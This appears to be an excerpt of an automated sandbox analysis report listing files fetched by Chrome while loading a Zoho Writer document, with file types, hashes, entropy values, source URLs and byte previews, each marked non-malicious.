                                                    Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 290152, version 0.0
                                                    Category:downloaded
                                                    Size (bytes):290152
                                                    Entropy (8bit):7.994865573570066
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:C94CACF5678F0314D238E639D9E17F55
                                                    SHA1:5A3777E3CC7F5AEC2C6C38D5BA5DFA9C32C98ABE
                                                    SHA-256:FCAE624E6AC9066F9CF44179B69AEB4DCD28F296A0F9CD2024870D2EC0B4B04B
                                                    SHA-512:952C2E1D819F1036E7732BCE7F697C1D250732259042D3258636977B48867C8FCD4A2618C845F3132E81AF311174B754A96390C09C23B6D22671D14DDDA17EF3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2hairline/font.woff
                                                    Preview:wOFF......mh................................GPOS......X...~4....GSUB.._....U..$ll..xOS/2.......`...`h...cmap...p...X....P...cvt .......g....3..bfpgm..'.............gasp................glyf..L(........m.z.head...l...6...6....hhea.......!...$...dhmtx...H...%../<. ..loca...|....../@(1E:maxp....... ... ...Uname.......N...J./.opost........... ....prep..-p........o.i:..........._.<...........y........i...x..............x.c`d``../........\..@.d.}..........................P.`.w.............).d.....x.......x..........................P......!....tyPL.@.....J.z...... ..........x... ..x..y|.....]..(..8....EQP@0.D..,a....&.....$.. h.....Q$(K..("....y...T.<.....Hz~..o...........9U...u..N..u..h...6...M..6..>G..l..L..+.\.4I..Yv!e.......c....j'...V1Z.t~d.B...f../a.z..$zej%..0N...j9n.._...(..m..h.....F..HV.(..C..v..G....k..#C....K..|..J.....O[?.]).,'}..#.....J..zU......Lg.Y'......c.j....*...2...Rr..a}.,#..!XY....]s..=>.........+.D...{:b.`......9...\.5......UO.U}(.!:l....h.g>...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 185716, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):179419
                                                    Entropy (8bit):7.99693200752567
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:2D78E4CF80D8ABE78E71815235D818D3
                                                    SHA1:79193903EF040840AB2381A1CC3C84A52B482518
                                                    SHA-256:D92DDE2E1E250BD1341F65F31AFD875F0432673853413DFE5A5BE6B033166265
                                                    SHA-512:D4EE460BDC8632B9F93146FB53F3BC32C3DF333855058FE0AD845A9C9516A75925CD3AC85BBEA5270197DCD29C899701D774FE1845D65FF22D04DC514A2E593F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2hairline/font.woff2
                                                    Preview:wOF2.......t.......................................4..l.`..&..f...........t.6.$..<..@.. ..J. ..9[.....f.O%y,i.*..:........h.XIr.&.._"..D./..8.\.m;.......Ek...L..C....J..C."9*O.............................G$.pZ.Y[....m...L.Pf.O4 .H5.O...,$Z@.....j)+....4A..f....m$...|l.B......Y..{.j..CC...Gb2.IE.TC?.).UQ*.....|.<..7.+..9.C'`.jI......4..1i=S^z4.bz.RV...P1S.K.....3$..b~...:U..........,...Xi.U.#.._.f..4...B9Yj,.-MR.ogHB.M..2.....q~....My...l1.1.....l.;.i....._.Z......#..lH.Nx.N....HBd._..J.D6..D.l.RU.P.P..(..^.o....ieL.:...]H.. ...e.t.r}EX.x..<?|x.GQU#k=o.. |iVxx.MB.2...0.M...P...Zq.IS....(3(S(.`ur\.h#....Y.l,. ...M....T......(..GTE.*P.......W..[....!..Q...+Rb..D.6v...c!...kN...............<..g.._TiP..=[.r..y$...'E...tc..T..K.b......Z...:..z...|"G...?_$9.d..-K[ra..D..D....C.B..b..K:C....^."-g..'2........V........*sJn.T......SSbX.A&v..|A....b=v..h9z....w..{.*....3...4..X..x ...}.....X,.n..}.%....O..g.h..Z.T.m.B...\9R(..1z:.%.M...u(B......iM.....L....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                    Category:dropped
                                                    Size (bytes):35170
                                                    Entropy (8bit):7.993096534744333
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:171A4DD9400708B88724B57D62B24A6A
                                                    SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                    SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                    SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (60133)
                                                    Category:dropped
                                                    Size (bytes):60134
                                                    Entropy (8bit):5.732537254147519
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D388C3E5D2EFE6DDEB03466C60055294
                                                    SHA1:226BD87A1DA051F09E3C5CE996C0D24D8DACC7FA
                                                    SHA-256:EA551A0A105CBEDF2CC2B705807990AF7BF4620E5F0490F44005ECB95042B643
                                                    SHA-512:CD0E09A706CEA9559D894104CC5EDA62114CD8E11D7B5EF9811305BDE7B8AC0859CBFA056B0D4A68B821D9E9D2A6ABBA3BE09B30BAD3412466E9409A4C0011E0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):e.ZSEC=t()}(this,function(){"use strict";function e(e,t,r,n,o,i,a){if(n||!(t in e))return Object.defineProperty&&function(){try{return Object.defineProperty({},"x",{}),1}catch(e){return}}()?(o=!0===o,i=!0===i,a=!0===a,Object.defineProperty(e,t,{value:r,writable:o,configurable:i,enumerable:a})):(e[t]=r,e)}var u,l,c=(c=String.prototype.codePointAt)||function(e){if(null===this)throw new TypeError(" ");var t=String(this),r=t.length,n=e?Number(e):0;if(!((n=window.isNan(n)?0:n)<0||r<=n)){var o=t.charCodeAt(n),e=void 0;return 55296<=o&&o<=56319&&n+1<r&&56320<=(e=t.charCodeAt(n+1))&&e<=57343?1024*(o-55296)+e-56320+65536:o}},m=String.fromCodePoint;m||(u=String.fromCharCode,l=Math.floor,m=function(){for(var e=[],t=arguments.length,r=Array(t),n=0;n<t;n++)r[n]=arguments[n];var o=r.length,i=-1;if(!o)return"";for(var a="";++i<o;){var c=Number(r[i]);if(!isFinite(c)||c
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                    Category:downloaded
                                                    Size (bytes):17174
                                                    Entropy (8bit):2.9129715116732746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):112
                                                    Entropy (8bit):4.609991199099521
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DC87085C5468EE585250B76C746EE144
                                                    SHA1:4DA7D88D0F20D4ACA1F9DD5B783B09CA21DDCF26
                                                    SHA-256:ACA5514F5B8E122586942EDB7055E4B0205825DCD9E1F8FB01C1269CB2688379
                                                    SHA-512:160CB7A3823EA15E9A9C059457E891160157B8521DFFC4EFD11BDB9B5761815EEBD467DC946D2BCE508C633D892C604612625B532F6D11440247973ED7ABBB58
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISSAkqruMhsuRXnxIFDR3cwiISBQ00p0lEEgUN5X_4rhIFDdKjMpQSBQ0SHd9BEgUNMa7NYhIFDZGngLsSBQ3N100qEgUNCwlxEQ==?alt=proto
                                                    Preview:ClEKBw0d3MIiGgAKBw00p0lEGgAKBw3lf/iuGgAKBw3SozKUGgAKBw0SHd9BGgAKBw0xrs1iGgAKBw2Rp4C7GgAKBw3N100qGgAKBw0LCXERGgA=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                    Category:downloaded
                                                    Size (bytes):673
                                                    Entropy (8bit):7.6596900876595075
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0E176276362B94279A4492511BFCBD98
                                                    SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                    SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                    SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                    Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):121695
                                                    Entropy (8bit):4.804378623712465
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:85440164E198CB44382EDA76B5831B94
                                                    SHA1:362AEEA3E40DE436AF7B2FF67987132531C2DFD7
                                                    SHA-256:943FBB86D044081BD6C6D64189BE5F78F850BF8A315F8C40DEDB5EBDE13B8941
                                                    SHA-512:329285EC03E3DF68EB15BC68D77787ABD7BA0B946AB65FFE74358E8A3875038E4D54AB2AD018E5C84813412F26B7170C9E1E3889C851A4AB7015D2F1E9490390
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:WmsResource.MessageObject={'is_idle':'is idle','says':'says','Jan':'Jan','Feb':'Feb','Mar':'Mar','Apr':'Apr','May':'May','Jun':'Jun','Jul':'Jul','Aug':'Aug','Sep':'Sep','Oct':'Oct','Nov':'Nov','Dec':'Dec','Mon':'Mon','Tue':'Tue','Wed':'Wed','Thu':'Thu','Fri':'Fri','Sat':'Sat','Sun':'Sun','minimize':'minimize','maximize':'maximize','Smileys':'Smileys','has_entered_text':'has entered text','Feed_History':'Feed History','Search':'Search','All':'All','Message':'Message','Sender':'Sender','First':'First','Previous':'Previous','Last':'Last','of':'of','Zoho_Info':'Zoho Info','Online':'Online','Offline':'Offline','No_feeds_found':'No feeds found','Group_Chat':'Group Chat','common.delete':'Delete','Idle':'Idle','Invisible':'Invisible','Search_Contacts':'Search Contacts','Available':'Available','Busy':'Busy','userstatus.away':'Away','userstatus.dnd':'Do not disturb','lst_seen':'Last seen ','last_seen_settings_message':'If disabled, you\'ll not be able to see the last seen of any of your contacts
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):160405
                                                    Entropy (8bit):5.5048595454199925
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:857DE5650BFAB333D718EC52EFC24C3F
                                                    SHA1:CC42EC9B9EF5894876CFA5F3954C420BE6AF050B
                                                    SHA-256:A714479FBA82A3CAE207ADECA3FA5A99B12F01F1D395E1ABC7ACBC6F24AA144D
                                                    SHA-512:AA9F7250C3BBEFB781AA7ECFB1B0C6398D3274AED50FAB0936F194AFC9C76CB35D6517F469AD243F91F1EC32243E73C169F6A48F53E8000DF423A00DA4CA9291
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:(()=>{"use strict";var e={522:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.Design=t.isStyleType=t.styleTypes=t.alternateStyleToBeUsed=void 0;const i=n(727);t.alternateStyleToBeUsed={Heading1Char:"h1",Heading2Char:"h2",Heading3Char:"h3",Heading4Char:"h4",Heading5Char:"h5",Heading6Char:"h6",Heading7Char:"h7",Heading8Char:"h8",Heading9Char:"h9",TitleChar:"h101",SubtitleChar:"h102"},t.styleTypes=["para","char","table","shape"],t.isStyleType=e=>-1!=t.styleTypes.indexOf(e);class s{constructor(e){this.basedOnCacheForParaStyle={},this.basedOnCacheForCharStyle={},this.basedOnInstancesForParaStyle=[],this.basedOnInstancesForCharStyle=[],this.textStyleCantBeSaved=window.shouldNotCarryTextStyle,this._={},this._computedStyles={para:{},char:{},table:{},shape:{}},this._.tempStyles=JSON.parse(JSON.stringify(e.styles)),this.styleUIInfo=null!=e.styleUIInfo?e.styleUIInfo:{para:{},char:{},table:{},shape:{}},this.styles=e.styles,this.theme=e.theme}get design(){let e={};return e[ATTR_BODY.DS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):716944
                                                    Entropy (8bit):5.241718046160976
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:465CEE0D06F1A2E084BC9C2708A899A5
                                                    SHA1:BC17C8BFA7F7B87FFE7A5D94BC2979AB1634D7BA
                                                    SHA-256:D7CD7EB6DBBFFF248E68951A0314F3B90D7DAF0356AFD6418236C66EA24DFE82
                                                    SHA-512:C28E02A930FAF590048ED2975364F09D943495BC891ACF5DF19472C2529DC661A8369F0CD9A89588DE298EE5DFF918FB8E44D45D3AAAA46EAB86595CB158B7D0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://css.zohocdn.com/ichat/css/Jan_02_2025_9731896_wmsbar.css
                                                    Preview:[class^="zchat-"]:before,[class*=" zchat-"]:before{font-family:ZoFo-ChatBar;font-weight:normal;font-style:normal;font-size:1em;text-shadow:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.cmsgdlg .cstomtime,.zc_cstm_ovrly .zc_btn_bx{display:none}.zcntnbx,.zcmsg_bx5 .btncnt,.zcmsg_bx1 .btncnt,.zcmsg_bx6 .zcbtmbx{display:table;width:100%;table-layout:fixed}.tblerow{display:table-row}.zcntnbx>*,.zcmsg_bx5 .btncnt>*,.zcmsg_bx1 .btncnt>*,.zcmsg_bx6 .zcbtmbx>div,.tblecel{display:table-cell;vertical-align:middle;min-width:90px}.zccustmsg,.zccustmsg+.zcntnbx,.zcmsg_bx1 .zcntnbx>*,.zcmsg_bx6 .btncnt>*,.zcmsg_bx1 .zctitle>div{display:inline-block;vertical-align:middle;width:100%}.msgtblecnt .tblerow:first-child>div{background-color:#f4f4f4;font-weight:bold}.zctitle{margin-bottom:5px}.zcmsg_bx3 .btncnt>*,.zcmsg_bx4 .btncnt>*{margin-bottom:10px}.mrgL8{margin-left:8px}.mrgL10{margin-left:10px}div.cmsgdlg .mheader{padding-top:10px}div.zc_cstm_ovrly .msgbox .paddT10,div.zcms
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):651
                                                    Entropy (8bit):5.129875522441486
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E6072226803D03B31C260309A12E2DBE
                                                    SHA1:1F1962AFD321BAAFE26E6EECA902964470E74B6D
                                                    SHA-256:4D21B62F206D3A0F20CB49C2087FB78923F1C14D514AE81C4D36A4B7BE2FD4D7
                                                    SHA-512:F2F3C85845D3C44F42436ED2181B32F7A52CCDC9E1D80980FADA2C49365CF8EDBA0FABB6BE670B43F467F7B4BC03D80A0AFB471D7687D2E37A22E1E933560589
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*$Id$*/./*Macros.createNewFile = function() {..//window.open("https://"+editorProps.urls.teamdriveURL+"/createnew.do?service=zw&parentid=-1"); //No I18N..window.open(window.location.origin+"/writer/new?rid="+ editor.doc.docInfo.RID + "&from=menu"); //No I18N.};*/.Macros.getUpgradeUrl = function() {..return location.protocol+"\\\\"+editorProps.urls.teamdriveURL+"/upgrade"; //No i18n.};.Macros.getDocsUrl = function() {..return "https://"+editorProps.urls.teamdriveURL; //No I18N.};.Macros.isWorkDriveDocument = function(){..return true;.};.Macros.isCropAllowed = function(){. return true;.};.Macros.isFloatAllowed = function() {..return true;.};
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 51804, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):51804
                                                    Entropy (8bit):7.996226299993042
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:3B4FE82EB465B966C6792EF6ABF81C52
                                                    SHA1:E89302FFCD9CAB04E58CB98C9D3445217CF5E927
                                                    SHA-256:56EFA948CA247F05AB4C47B5E93C1893D53C5999478D4DCCE26EF22757AADEFB
                                                    SHA-512:EDCB2F570ACF846D371999A8869BBD8B8C934BFB246908F37A9BA1793EDBAF0974CD644AC05245917B8BB7C3838291EB40AA79836E506B39988B762272F2CE3F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Extralight.woff2
                                                    Preview:wOF2OTTO...\......P................................_.....0..*.`..X.6.$..8....s. [.Oq$.c..Y.e.h.W....+....;.f..'...@wN........OO6b...x_U....M.........p.l0......Ga1M......5...w.....l.L....@.V..r..w..q..UU.GO.4.S.6....O.'2.S..Z..pj..L.FP.......g.Cdf.2.B33.@.W|...V^a8..%..Tx.....R<.r'....:.).\w%.&Ml...S1D.H.T.1.cj..........).w..?..V..jTIj.....;~.Q,...........U...L...}.....N.iE......,2.dsr...<?.?..-..m...0.H..5...c.E*.gD.mM".,......j .Dd... "."".X;W.=3..,...K+3...j[_...+...........h$....H3......E.......y.D...I.1Z.a. t..'P.........../.Z.%Xr.....fK..+}./...DB..C...e;m.d.....K.G..3.......V..!s....b.Q..!;l@.eR.$....}...Ju9.....(..S..9.D.\.@.~.AS2?P....7....QS.j.......d._j........O._Y.o.o..x]...&2.l..h;P ...R.S......)PR.s. )......>...Tf....?.iF...j."....+.6....)=.Q.H.8...V...` Y ...;.,...p..R...'......?....H....3...'`=O..2....X1."....*.....9..A..SO.e...D%t...FI...d."..m.......L$+...X%(..~..{,..t."....d.bH.`..D7.lr...P.G.U....!..I.M.p.;U..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 71160, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):71160
                                                    Entropy (8bit):7.997033225219998
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:7D352D03ACD6817EC884E42176130771
                                                    SHA1:33BA2AFCEBE15A9F6196D7F364438660C1A1840E
                                                    SHA-256:2515B0239544CDD2EA0BC9577056FAF3E78E8428FB3A640C57A869B5ABC87AE2
                                                    SHA-512:6F9B83683C1FDDEA5B36957605F430E444D4F8B75333A5473DC6CDE9DC0D00DE56E1230B53EC05432C44555BE2F357119B281B459BF4C7599E09D7B8FEF419E1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotothinitalic/font.woff2
                                                    Preview:wOF2......................#.....................?FFTM..~...R..L.`....H..<.....4..p.6.$..8..... ..(..f..c[..U.n{.K..@..`....X..n..N.^=..;...o=!ss>:Pzn...K9.......uIE.J.T6...B..".Dm..w.a.....i%C......E.FN..nl....Z;....L3V.._'a.F.f......A>`F.#c3...T./......v..Y.._..BP..h..5...r.f.?'WUU....T.L2R.LE.........5....mJH..DR.G.%oS.h._T.....T.>....&)..Y.<..T..L.|9.t6m......=..`.D.].%_P.7YE....R.....H.K.wY.{....^.r.........s..WDT...~.//....'......._...^.....F;.z....Mc6..Z...*k..\..]p&3....h.....bS..{.W{.I..y!....MM{.4.vUx..VC..\7y.*.w.=.?.......Uy.}...F.... DJ....~h..g2...R..`...ZI5...[... *w#%:7*G..n..A,...7..}_..L/...k;a|y.._....+g4.4{....1@....../O...{f...?.B."I(..,l.!.&.E..........9...sf.>s.}....:.af...Y..i.HS.Q.J....D.%....v..1.-..RH.....b..F....q.....Q...X.)<...A.`.*...T..8.y...+.....~.M....~~.}.}.....9kT...C@. .....vT...U5..d[rI...a/uY...X.H.!.<...|..wWx#+.(.@...a6MK.4..},....D.'......I....G........!0p-AG..W].....E...4z.Z$.U.G..|....,@.r.7.n..Z.'@
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 51084, version 1.6554
                                                    Category:downloaded
                                                    Size (bytes):51084
                                                    Entropy (8bit):7.996019632069552
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:ED0D14764BBE7E7AE8CD093AF6C12C5B
                                                    SHA1:74EF71B6A0B867D772A639179AD55233659C4EE2
                                                    SHA-256:5CEEC82F9678FBBB7630F682842EFDDFFF95F8A1C4E913B3C236A22EF8CAC959
                                                    SHA-512:3DB3D58CFEC011EC02521086ADC52B8277CAC48C03507C253B1CA46EA96CC3A6178596AB5D4D5D7A668376BD14E5A8DFBB37BBCB1C9CAA381EC7DD25BB5A7C47
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/opensans/font.woff2
                                                    Preview:wOF2..............P...#........................?FFTM.....\..D.`..n.."..4.....x..U.6.$..$..X.. .........[........}Jf.;G.....T...h..U...L...MCf.] a.y......_.Ld...\.. .....c... L...Z&L..m.n.. ..GFo9..8...,...X.e.4ynP..s1P94.P.=".a..q...,.^1..i+N.,gIY.J#Aq[..,Y..knA0....v...\.y.. VSn|P...NOC`...-.)......*.8.s .=%./&......r..m..j...o..zgSN.s...F..T....0qS..\eI.N......%.A2..'....L.k.@.H#aT..%A.....4.....+...m./\8zl.@\.hp>.@.._G./.|bI....4.c..V..l..v(;.....[F.n.o..Qm.6fx.E...L....,kS.D../....}d..Y.W.>!<.........x....4n.e..)D.T...?.S1..V.*........<..xP...<... .(. ....(............1._+{g..-k.....l.^.n93..y..NvN.....l...s...>..f~.Y.|..0...5Y..^/b>.......%.w.....3..u...V.^.s.[|...l....:..Yiw.....r...............?.....N...?`....?:.......m'.1%2.(S.J..+..t.QX.e6Vp}.........4#7.a...d..l.AB.cW....-VB..62...!b.l.a.(76le..m..B6...n........^.#...H...x"."...jZ.Af.H.a...RZX~......c.h.j....E.Qe}H....,7.......Qg.......I+....Y....i.J^.I.r.l6...F..(.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 54332, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):54332
                                                    Entropy (8bit):7.996369018631292
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:67F780888B802D6FD1A50766ED9F82E8
                                                    SHA1:5940E38B4E8E5A332F8EA30056D1433323D7CED6
                                                    SHA-256:68A3F2B030C329AC73EA2A4BB261C65C4071B078FEB2685378A1A0E5B56C6F1F
                                                    SHA-512:0AFB03BDA13FC4D4C6341C89CE2F32B2794848E329B8D429E22C7414688BD1F3CE6680E9B54D21D1143A29D06440DAC7BF5D05EFA731FE8736B69956825BC8C4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Semibold_Italic.woff2
                                                    Preview:wOF2OTTO...<......]`...............................b..h.....*.`..X.6.$..8...... [.\q'~>c..oJC+.c[M.....\".;.4uW..;.!s..1.;8x........'.......k.UU.....t.Y.47...fJ.....;FL.3.!.v4... w.%..%R......;....B$B.k_...O>...x5.....*y......I. L.$8ix..J...mU!O.....<.=..BDGH.UI.Ti*..0b.;_n.;mI....g.$jj.R..k...}N......8..3....p.hZ.......,....o..<.yi......Lb0./..M..P&..E+|.....=...*...%.........e.5..."6.|.....\#....jD........i..FP....6..@4h.M.z............%k...5k....d.$.,.$.e}..kk..I.]..q....%.eS. ...K.T,.K.K-.K..J...6......E"...D$.>Qy.....Vt..._.f].k...v...R!...e.F.+.......dQ,Y..1".0`..1"G...Q..*..}m.+...PD........./q`7..!l..p....L.[........T...<u......"x`.L[.-..h.1S...B.31.....9..r..*...E.......s..._?..u.kCv"G...1A6.F.;.p.I.M6A`...&$..D......u...iD..W..;..C6D...o.Z.}B.0..d..=) .....w...f.N-(.5.Cp(1.. `K-=....:....$]u..).. .=...X~h:7.A..o!iD.....b.gV...?...%.,.".o........~.Z....V?...o...".1..p.qT...D........I0.8Q........_.....9..|..J..h ..........1.N`.zTH.@..Dl..*.v.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):1851741
                                                    Entropy (8bit):5.484215761591461
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4495BE938386726904FFBCCE7CE17E7B
                                                    SHA1:0F048CF2783132CC9FD5C060CEE4A3315E686EF2
                                                    SHA-256:8DCD64856D13A9B17366BA98C2322640C1BD923556EA8BB09A702873647CC719
                                                    SHA-512:AF5EF752926D6934D9B7256AD2B8E7B704B0CA63BA3E0069A2054EE759213437BD5DB61C22266C189EAA91E37D7F834A5270795EB14DF80E258FE72D54522BE0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/writer_min_all.4495be938386726904ffbcce7ce17e7b.js
